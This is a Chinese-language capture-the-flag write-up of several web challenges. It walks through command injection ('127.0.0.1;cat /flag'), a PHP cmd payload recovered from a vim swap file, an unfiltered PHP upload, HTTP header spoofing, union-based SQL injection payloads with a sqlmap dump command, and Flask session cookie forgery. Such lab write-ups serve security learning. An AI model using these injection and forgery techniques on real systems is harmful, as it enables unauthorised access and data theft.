打开题目发现是小游戏
直接js找flag
直接在game.js找到flag
NSSCTF{y0u_w1n_th1s_!!!}
应该就是写php代码命令执行
<?php
$a=sysetm('ls /');
?>
得到flag
打开题目
提示漏了,猜测源码泄露
直接disearch扫
直接去/.index.php.swp下
得到swp文件
题目提示vim编辑器,用kali打开文件
语句
vim 文件名
得到一段php代码
恢复文件:
vim -r index.php.swp
分析:
传参cmd和password
构造payload
cmd=cat /flag&password=R2l2ZV9NZV9Zb3VyX0ZsYWc=
得到flag
打开题目发现是登录框
F12一下发现提示admin,admin,直接登录
发现为文件上传,直接传php发现成功(啥过滤都没有)
得到flag
打开题目,直接js找flag
找了半天,发现是改过的 f1ag
访问,发现是jsfuck
直接控制台得到flag
打开题目
我们ping一下,127.0.0.1
我们添加命令
127.0.0.1;cat /flag
发现有过滤,要绕过前端检测
方法一:禁用js
F12+F1
再次输入命令,得到flag
方法二:bp抓包绕过前端
ls一下
注:这里不需要system,因为分号后就是命令
直接cat /flag
打开题目,一眼XFF
bp抓包
给嘲讽了。。
再试一下client-ip: 127.0.0.1
提示我们不是来自于pornhub.com,利用Referer
添加Referer:pornhub.com
提示要用Chrome浏览器
修改User-Agent
继续添加头,修改代理服务器
语句
Via:Clash.win
访问/wtfwtfwtfwtf.php
F12查看发现hint
继续访问
得到flag
打开题目
发现题目已经告诉我们sql语句的闭合方式
?id=1))))))
我们依次输入0,1
发现0会有报错
那么我们可以采用联合注入
第一步先查询所有数据库
语句
?id=0)))))) union select 1,schema_name from information_schema.schemata; --+
第二步查询表
我们先查查ctftraining
?id=0)))))) union select 1,group_concat(table_name) from information_schema.tables where table_schema='ctftraining'; --+
发现flag
第三步查询字段
?id=0)))))) union select 1,group_concat(column_name) from information_schema.columns where table_name='flag'; --+
继续查
?id=0)))))) union select 1,group_concat(flag) from flag; --+
发现查不到
原来这里需要查询为表名.列名
修改一下
?id=0)))))) union select 1,group_concat(flag) from ctftraining.flag; --+
得到flag
直接sqlmap跑
语句
sqlmap -u "http://node1.anna.nssctf.cn:28512/?id=1" -D ctftraining -T flag -C flag --dump
打开题目,随便输个1上去
发现
重新试一下admin
发现还是不行
重新输入1
发现提示cookie
猜测session伪造
抓包
使用flask-session加解密工具
脚本使用方法
解密:python flask_session_cookie_manager3.py decode -s “secret_key” -c “需要解密的session值”
加密:python flask_session_cookie_manager3.py encode -s “secret_key” -t “需要加密的session值”
猜测密钥为LitCTF
因为身份得是管理员才行
我们得伪造admin,加密一下
(这里用cmd不行,只能用powershell)
把加密后的复制到session上
得到flag
因篇幅问题不能全部显示,请点此查看更多更全内容
Copyright © 2019- bangwoyixia.com 版权所有 湘ICP备2023022004号-2
违法及侵权请联系:TEL:199 1889 7713 E-MAIL:2724546146@qq.com
本站由北京市万商天勤律师事务所王兴未律师提供法律服务